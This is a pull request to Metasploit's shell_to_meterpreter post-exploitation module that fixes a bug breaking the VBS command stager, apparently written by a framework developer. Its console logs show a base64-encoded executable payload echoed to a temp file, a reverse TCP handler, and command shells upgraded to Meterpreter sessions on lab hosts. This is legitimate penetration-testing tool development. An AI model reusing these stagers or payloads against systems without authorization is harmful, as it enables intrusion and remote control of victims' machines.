### PR TITLE
Fix VBS stager in shell_to_meterpreter.

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -287,7 +287,7 @@ class MetasploitModule < Msf::Post
         # for an unlimited amount of time for the newly spawned session to exit.
         wait_for_cmd_result = i + 1 < cmds.length
         # Note that non-channelized cmd_exec calls currently return an empty string
-        ret = cmd_exec(cmds.last, nil, command_timeout, { 'Channelized' => wait_for_cmd_result })
+        ret = cmd_exec(cmd, nil, command_timeout, { 'Channelized' => wait_for_cmd_result })
         if wait_for_cmd_result
           if !ret
             aborted = true


### PR DESCRIPTION
A bug was introduced into the `shell_to_meterpreter` module that prevented the VBS stager from succeeding:

```
msf6 post(multi/manage/shell_to_meterpreter) > run win_transfer=VBS session=1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[-] Error: Unable to execute the following command: "echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA5JBHdfUV/jn1Ff459RX+OWoMEjn5Ff459RX6Of0V/jnQ96o58RX+OdD3ujnxFf45SaWNofUV/jgAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAH08xksAAAAAAAAAAPAAIwALAgEAADAAAAAQAAAAAAAAAEAAAAAQAAAAAABAAQAAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAEBCAABIAgAA/aAAAAIAAIAAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAADIQQAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhCAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAE4QAAAAEAAAABIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACEAAAAADAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQC5peXJmAAAAQAIAAABAAAAABAAAABgAAAAAAAAAAAAAAAAAACAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7ChJx8FAAAAAScfAADAAAEjHwgAQAABIM8noJxAAAEjHwQAQAABIvkEQAEABAAAASIv486T/0EgzyegBEAAAUEFZTE9BRDoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\\JEHPU.b64"
[-] Output: "C:\\Users\\smash\\AppData\\Local\\Temp\\rOHTo.vbs(2, 1) Microsoft VBScript compilation error: Expected statement\r\n\r\nCould Not Find C:\\Users\\smash\\AppData\\Local\\Temp\\JEHPU.b64"
[*] Stopping exploit/multi/handler
[*] Post module execution completed
```

The error message is peculiar: apparently VBScript compilation failed while running an `echo` command.

The cause was always calling `cmd_exec` with the last command in the set. Introduced in #16621 - it would coincidentally succeed in most other cases, since they all manage to be single-line scripts (e.g. PowerShell, Bash or Python). But once you use the multi-command VBS stager, it runs the last command, and fails.

This PR, along with #18062, should resolve #16785.

## Verification

- [x] Run a command shell on Windows
- [x] Upgrade it to meterpreter using the VBS stager (`WIN_TRANSFER=VBS`, or just run on XP)
- [x] Verify that upgrading a Python meterpreter still works

### After the fix

```
[*] Using post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                                      Connection
  --  ----  ----               -----------                                                                      ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19045.2965] (c) Microsoft Corp...  192.168.20.206:4442 -> 192.168.20.15:13878 (192.168.20.15)

msf6 post(multi/manage/shell_to_meterpreter) > run win_transfer=VBS session=1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[*] Command stager progress: 14.11% (1699/12045 bytes)
[*] Command stager progress: 28.21% (3398/12045 bytes)
[*] Command stager progress: 42.32% (5097/12045 bytes)
[*] Command stager progress: 56.42% (6796/12045 bytes)
[*] Command stager progress: 70.53% (8495/12045 bytes)
[*] Command stager progress: 84.29% (10153/12045 bytes)
[*] Command stager progress: 98.17% (11825/12045 bytes)
[*] Sending stage (200774 bytes) to 192.168.20.15
[*] Command stager progress: 100.00% (12045/12045 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > [*] Meterpreter session 2 opened (192.168.20.206:4433 -> 192.168.20.15:13882) at 2023-06-06 07:31:15 +1000

[*] Stopping exploit/multi/handler
```

I also verified that the feature that introduced the issue (duplicating Python meterp without hanging) still works:

```
msf6 > sessions 

Active sessions
===============

  Id  Name  Type                      Information           Connection
  --  ----  ----                      -----------           ----------
  1         meterpreter python/linux  smash @ msfdevubuntu  192.168.20.206:5444 -> 192.168.20.206:58536 (192.168.20.206)

msf6 > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[*] Command stager progress: 100.00% (773/773 bytes)

[*] Sending stage (1017704 bytes) to 192.168.20.206
msf6 > [*] Meterpreter session 2 opened (192.168.20.206:4433 -> 192.168.20.206:43906) at 2023-06-06 07:33:12 +1000
[*] Stopping exploit/multi/handler
```